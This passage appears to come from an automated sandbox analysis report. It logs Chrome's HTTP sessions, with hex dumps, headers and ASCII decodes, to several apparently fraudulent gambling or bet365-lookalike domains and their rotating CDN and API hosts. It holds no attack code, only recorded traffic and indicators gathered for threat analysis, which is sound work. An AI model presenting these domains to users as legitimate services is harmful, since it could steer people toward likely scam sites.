                                                                                                                                                          2024-06-09 22:40:48 UTC16384INData Raw: 20 20 22 77 73 73 61 2d 33 36 31 2e 69 78 69 61 6f 73 68 69 7a 69 2e 63 6f 6d 3a 31 37 38 35 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 77 73 73 61 2d 33 35 31 2e 74 61 69 6a 75 65 74 61 69 71 75 61 6e 64 61 6f 2e 63 6f 6d 3a 31 36 38 35 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6f 63 73 61 70 69 31 39 36 32 2e 77 77 77 62 79 66 65 6e 2e 63 6f 6d 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6f 63 73 61 70 69 31 39 36 32 2e 68 79 64 71 65 66 2e 63 6f 6d 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6f 63 73 61 70 69 2d 61 77 73 2e 62 61 6b 65 64 64 6f 76 65 2e 63 6f 6d 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6f 63 73 61 70 69 2d 61 6b 61 2e 62 6c 61 63 6b 6b 68 61 6b 69 39 31 38 2e 63 6f 6d 22 2c 0d 0a 20 20 20 20 20
                                                                                                                                                          Data Ascii: "wssa-361.ixiaoshizi.com:1785", "wssa-351.taijuetaiquandao.com:1685", "ocsapi1962.wwwbyfen.com", "ocsapi1962.hydqef.com", "ocsapi-aws.bakeddove.com", "ocsapi-aka.blackkhaki918.com",
                                                                                                                                                          2024-06-09 22:40:48 UTC2949INData Raw: 2f 20 72 61 74 69 6f 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 61 6e 67 65 2e 62 6f 74 74 6f 6d 20 3d 20 4d 61 74 68 2e 63 65 69 6c 28 28 74 6f 70 20 2b 20 62 74 6e 48 29 20 2f 20 72 61 74 69 6f 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 61 6e 76 61 73 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 72 69 67 68 74 20 3d 20 4d 61 74 68 2e 63 65 69 6c 28 63 61 6e 76 61 73 2e 77 69 64 74 68 20 2f 20 32 20 2b 20 62 74 6e 57 20 2f 20 32 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 66 66 73 65 74 58 20 3d 20 65 2e 6f 66 66 73 65 74 58 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f
                                                                                                                                                          Data Ascii: / ratio) range.bottom = Math.ceil((top + btnH) / ratio) canvas.addEventListener('click', function (e) { var right = Math.ceil(canvas.width / 2 + btnW / 2) var offsetX = e.offsetX var o


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          96192.168.2.549833183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:48 UTC579OUTGET /ftl/bet365-1761/themes/style/bootstrap-dialog.min.css HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:49 UTC678INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Content-Length: 625
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-HUZ-MP-02-09
                                                                                                                                                          ETag: W/"651e5941-adc"
                                                                                                                                                          Date: Thu, 06 Jun 2024 21:03:25 GMT
                                                                                                                                                          Last-Modified: Thu, 05 Oct 2023 06:35:45 GMT
                                                                                                                                                          Expires: Sat, 06 Jul 2024 21:03:25 GMT
                                                                                                                                                          Age: 265043
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-206
                                                                                                                                                          x-link-via: dgct63:443;huzmp02:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-HUZ-MP-02-09
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-25
                                                                                                                                                          X-Cdn-Request-ID: b412574f0234d6df91f70ac86b74507a
                                                                                                                                                          2024-06-09 22:40:49 UTC625INData Raw: 1f 8b 08 00 00 00 00 00 00 03 9d 56 d1 8e da 30 10 7c e7 2b 2c 55 95 ee 1e 8c 9c 83 eb 35 a9 5a f5 57 36 b1 93 58 38 de c8 76 0a 5c 75 ff 5e 13 0c cd 41 12 0c 3c 20 b2 ec ce cc da de 89 97 39 a2 b3 ce 40 4b b9 04 85 15 59 36 c8 41 d1 5a 00 17 86 fc 5d 10 ff c9 d1 f8 07 ea b0 a5 4a 94 8e 1a e0 b2 b3 19 59 b7 bb 1f 97 09 46 56 f5 a7 8c c5 c7 62 b1 bc a6 b9 8c 50 27 9d 12 81 b0 40 85 26 23 5f ca b2 3c 12 38 b1 73 14 94 ac 74 46 0a a1 9d 30 c7 78 89 da 51 2b df 45 46 92 ef f1 5c 8d b0 16 aa 13 db 10 e4 0e c1 79 e7 1c 6a 2a 0b d4 01 a8 01 53 49 7d 5c 82 8c ac e2 a1 0a 85 56 04 c0 6b 51 2f ec b4 ce a5 42 f0 c8 3d 41 88 48 e5 17 23 23 a0 da 1a 9e b0 85 42 ba fd cf 94 3d 1f ff a6 0d be d3 10 cd c8 32 0d d1 4d ed 1a 75 1d 1f 04 1e 51 9e d5 f8 e7 7c 66 8a ce d8 c3
                                                                                                                                                          Data Ascii: V0|+,U5ZW6X8v\u^A< 9@KY6AZ]JYFVbP'@&#_<8stF0xQ+EF\yj*SI}\VkQ/B=AH##B=2MuQ|f


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          97192.168.2.54982938.174.148.2354434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:48 UTC346OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                          Host: e933002.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:49 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:40:49 UTC34INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                                                                                                                          Data Ascii: Cache-Control: no-cache,no-store
                                                                                                                                                          2024-06-09 22:40:49 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/html; charset=utf-8
                                                                                                                                                          2024-06-09 22:40:49 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                                                                          Data Ascii: Connection: close
                                                                                                                                                          2024-06-09 22:40:49 UTC28INData Raw: 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a
                                                                                                                                                          Data Ascii: Transfer-Encoding: chunked
                                                                                                                                                          2024-06-09 22:40:49 UTC2INData Raw: 0d 0a
                                                                                                                                                          Data Ascii:
                                                                                                                                                          2024-06-09 22:40:49 UTC5INData Raw: 35 38 62 0d 0a
                                                                                                                                                          Data Ascii: 58b
                                                                                                                                                          2024-06-09 22:40:49 UTC1426INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 32 3b 75 72 6c 3d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 5f 5f 43 42 4b 3d 33 30 30 66 61 39 39 64 32 63 61 38 33 65 36 38 63 33 66 32 38 30 38 63 31 64 34 37 35 37 62 35 34 31 37 31 37 39 37 32 38 35 30 5f 31 32 31 33 37 33 30 39 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2e 73 6b 2d 74 68 72 65 65 2d 62 6f 75 6e 63 65 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 74 6f 70 3a 20 35 30 25 3b 0a 09 6c 65 66 74 3a 20 35 30 25 3b 0a 09 0a 09 6d 61 72 67 69 6e 3a 20 34 30 70 78 20 61 75 74 6f
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="refresh" content="2;url=/favicon.ico?__CBK=300fa99d2ca83e68c3f2808c1d4757b541717972850_12137309" /><style type="text/css">.sk-three-bounce {position: absolute;top: 50%;left: 50%;margin: 40px auto


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          98192.168.2.549836202.61.87.2244434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:49 UTC632OUTGET / HTTP/1.1
                                                                                                                                                          Host: xpj723.cc
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:49 UTC407INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:49 GMT
                                                                                                                                                          Content-Type: text/html
                                                                                                                                                          Content-Length: 48883
                                                                                                                                                          Connection: close
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Last-Modified: Tue, 06 Jun 2023 07:31:39 GMT
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          ETag: "647ee0db-bef3"
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          X-Cache: EXPIRED
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:49 UTC15977INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 57 65 6c 63 6f 6d 65 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 73 74 79 6c 65
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1"> <meta property="og:description" content="Welcome"> <title></title> <style
                                                                                                                                                          2024-06-09 22:40:49 UTC16384INData Raw: 20 38 36 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 32 38 70 78 0d 0a 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 6c 6f 61 64 69 6e 67 2d 69 6e 6e 65 72 2d 33 20 7b 0d 0a 20 20 20 20 20 20 30 25 20 7b 0d 0a 20 20 20 20 20 20 20 20 74 6f 70 3a 20 37 39 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 34 32 70 78 0d 0a 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 35 30 25 20 7b 0d 0a 20 20 20 20 20 20 20 20 74 6f 70 3a 20 38 36 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 32 38 70 78 0d 0a 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 31 30 30 25 20 7b 0d 0a 20 20 20 20 20 20 20 20 74 6f 70 3a 20 38 36 70 78 3b 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                          Data Ascii: 86px; height: 28px } } @keyframes loading-inner-3 { 0% { top: 79px; height: 42px } 50% { top: 86px; height: 28px } 100% { top: 86px;
                                                                                                                                                          2024-06-09 22:40:49 UTC16384INData Raw: 64 6f 6d 4f 63 73 41 70 69 4d 61 78 74 68 72 65 73 68 3a 20 33 2c 0d 0a 20 20 20 20 20 20 20 20 6f 63 73 4b 65 79 44 69 63 74 3a 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 27 64 6b 30 35 27 3a 20 27 6c 74 64 6b 27 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 27 6a 62 30 30 27 3a 20 27 6c 74 64 6b 27 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 27 6d 77 30 30 27 3a 20 27 6c 74 64 6b 27 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 27 63 63 30 35 27 3a 20 27 6c 74 64 6b 27 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 27 6c 70 30 35 27 3a 20 27 6c 74 64 6b 27 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 27 61 6f 30 38 27 3a 20 27 6c 74 70 6f 63 27 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 6c 73 4b 65 79 3a 20 7b 0d 0a 20 20 20 20 20 20 20 20 68
                                                                                                                                                          Data Ascii: domOcsApiMaxthresh: 3, ocsKeyDict: { 'dk05': 'ltdk', 'jb00': 'ltdk', 'mw00': 'ltdk', 'cc05': 'ltdk', 'lp05': 'ltdk', 'ao08': 'ltpoc' } }, lsKey: { h
                                                                                                                                                          2024-06-09 22:40:49 UTC138INData Raw: 20 20 20 7d 0d 0a 20 20 20 20 6a 75 6d 70 2e 73 74 61 72 74 28 29 0d 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 76 61 72 20 72 64 6d 5a 74 73 53 74 72 20 3d 20 27 36 33 62 63 64 65 34 31 65 35 32 39 33 66 66 34 64 33 61 36 36 39 65 65 65 37 61 34 34 32 35 62 27 3b 20 0d 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                          Data Ascii: } jump.start() </script> <script> var rdmZtsStr = '63bcde41e5293ff4d3a669eee7a4425b'; </script></body></html>


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          99192.168.2.5498403.165.113.624434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:49 UTC562OUTGET /ocs/zbw?r=6891640824 HTTP/1.1
                                                                                                                                                          Host: ocsapi-aka.blackkhaki918.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://hg679.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:50 UTC531INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:50 GMT
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Api-Elapsed: 0.0000
                                                                                                                                                          X-Node: outer
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                          Via: 1.1 fb1fce80ce90aded0ac9dfb85e8fd086.cloudfront.net (CloudFront)
                                                                                                                                                          X-Amz-Cf-Pop: CDG50-P3
                                                                                                                                                          X-Amz-Cf-Id: IE-9_oA-siVk6fleSovC3B5feoy9pN6xMeiPbxEYsoGx-basEc4qUA==
                                                                                                                                                          2024-06-09 22:40:50 UTC12489INData Raw: 33 30 63 31 0d 0a 7b 0a 20 20 20 20 22 6e 6e 6e 22 3a 20 22 6f 75 74 65 72 2d 38 38 38 22 2c 0a 20 20 20 20 22 76 65 72 73 69 6f 6e 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 7a 62 5f 6d 22 3a 20 22 32 34 30 36 30 36 2d 30 31 22 2c 0a 20 20 20 20 20 20 20 20 22 7a 62 5f 70 63 5f 6d 65 6d 62 65 72 22 3a 20 22 32 34 30 35 32 39 2d 30 31 22 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 68 74 74 70 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 43 44 4e 5f 50 41 54 48 53 22 3a 20 5b 22 7a 62 2d 71 71 2e 67 7a 6a 71 77 6c 6b 6a 2e 63 6f 6d 22 2c 22 7a 62 31 2d 68 77 2e 71 65 63 74 79 6f 75 61 2e 63 6f 6d 22 2c 22 7a 62 2d 68 77 2e 63 7a 77 79 67 73 2e 63 6f 6d 22 5d 2c 0a 20 20 20 20 20 20 20 20 22 41 50 49 5f 44 4f 4d 41 49 4e 53 22 3a 20 5b 22 6f 63 73 61 70 69 2d 6c
                                                                                                                                                          Data Ascii: 30c1{ "nnn": "outer-888", "versions": { "zb_m": "240606-01", "zb_pc_member": "240529-01" }, "http": { "CDN_PATHS": ["zb-qq.gzjqwlkj.com","zb1-hw.qectyoua.com","zb-hw.czwygs.com"], "API_DOMAINS": ["ocsapi-l
                                                                                                                                                          2024-06-09 22:40:50 UTC5915INData Raw: 31 37 31 33 0d 0a 31 30 30 35 2d 30 31 22 2c 22 74 22 3a 31 31 30 7d 2c 0a 09 22 74 33 39 30 32 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 31 36 2d 30 33 22 2c 22 74 22 3a 31 30 38 7d 2c 0a 09 22 74 33 39 30 33 22 3a 20 7b 22 76 22 3a 22 32 33 30 36 32 30 2d 30 31 22 2c 22 74 22 3a 31 30 34 7d 2c 0a 09 22 74 33 39 30 34 22 3a 20 22 32 33 31 30 30 35 2d 30 31 22 2c 0a 09 22 74 33 39 30 35 22 3a 20 22 32 33 30 36 30 37 2d 30 31 22 2c 0a 09 22 74 33 39 30 39 22 3a 20 7b 22 76 22 3a 22 32 33 30 36 30 37 2d 30 31 22 2c 22 74 22 3a 31 30 38 7d 2c 0a 09 22 74 33 39 31 30 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 31 36 2d 30 33 22 2c 22 74 22 3a 31 30 39 7d 2c 0a 09 22 74 33 39 31 32 22 3a 20 22 32 33 31 30 30 35 2d 30 31 22 2c 0a 09 22 74 33 39 31 34 22 3a 20 7b 22 76
                                                                                                                                                          Data Ascii: 17131005-01","t":110},"t3902": {"v":"240516-03","t":108},"t3903": {"v":"230620-01","t":104},"t3904": "231005-01","t3905": "230607-01","t3909": {"v":"230607-01","t":108},"t3910": {"v":"240516-03","t":109},"t3912": "231005-01","t3914": {"v
                                                                                                                                                          2024-06-09 22:40:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          100192.168.2.54983438.174.148.434434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:50 UTC610OUTGET /ftl/commonPage/zh_CN/pubads/images/ads1.png HTTP/1.1
                                                                                                                                                          Host: x551005.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:50 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:40:50 UTC44INData Raw: 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 32 35 39 32 30 30 30 0d 0a
                                                                                                                                                          Data Ascii: Strict-Transport-Security: max-age=2592000
                                                                                                                                                          2024-06-09 22:40:50 UTC23INData Raw: 45 54 61 67 3a 20 22 35 64 38 34 38 66 34 66 2d 32 65 37 35 22 0d 0a
                                                                                                                                                          Data Ascii: ETag: "5d848f4f-2e75"
                                                                                                                                                          2024-06-09 22:40:50 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 32 33 3a 35 37 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:23:57 GMT
                                                                                                                                                          2024-06-09 22:40:50 UTC25INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: image/png
                                                                                                                                                          2024-06-09 22:40:50 UTC46INData Raw: 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 46 72 69 2c 20 32 30 20 53 65 70 20 32 30 31 39 20 30 38 3a 33 35 3a 32 37 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Last-Modified: Fri, 20 Sep 2019 08:35:27 GMT
                                                                                                                                                          2024-06-09 22:40:50 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:50 UTC29INData Raw: 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a
                                                                                                                                                          Data Ascii: X-Frame-Options: SAMEORIGIN
                                                                                                                                                          2024-06-09 22:40:50 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 31 30 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 32 33 3a 35 37 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Expires: Mon, 10 Jun 2024 22:23:57 GMT
                                                                                                                                                          2024-06-09 22:40:50 UTC30INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 38 36 34 30 30 0d 0a
                                                                                                                                                          Data Ascii: Cache-Control: max-age=86400
                                                                                                                                                          2024-06-09 22:40:50 UTC14INData Raw: 58 2d 43 61 63 68 65 3a 20 48 49 54 0d 0a
                                                                                                                                                          Data Ascii: X-Cache: HIT


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          101192.168.2.54983538.174.148.434434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:50 UTC610OUTGET /ftl/commonPage/zh_CN/pubads/images/ads2.png HTTP/1.1
                                                                                                                                                          Host: x551005.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:50 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:40:50 UTC44INData Raw: 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 32 35 39 32 30 30 30 0d 0a
                                                                                                                                                          Data Ascii: Strict-Transport-Security: max-age=2592000
                                                                                                                                                          2024-06-09 22:40:50 UTC23INData Raw: 45 54 61 67 3a 20 22 35 64 38 34 38 66 34 66 2d 34 62 62 63 22 0d 0a
                                                                                                                                                          Data Ascii: ETag: "5d848f4f-4bbc"
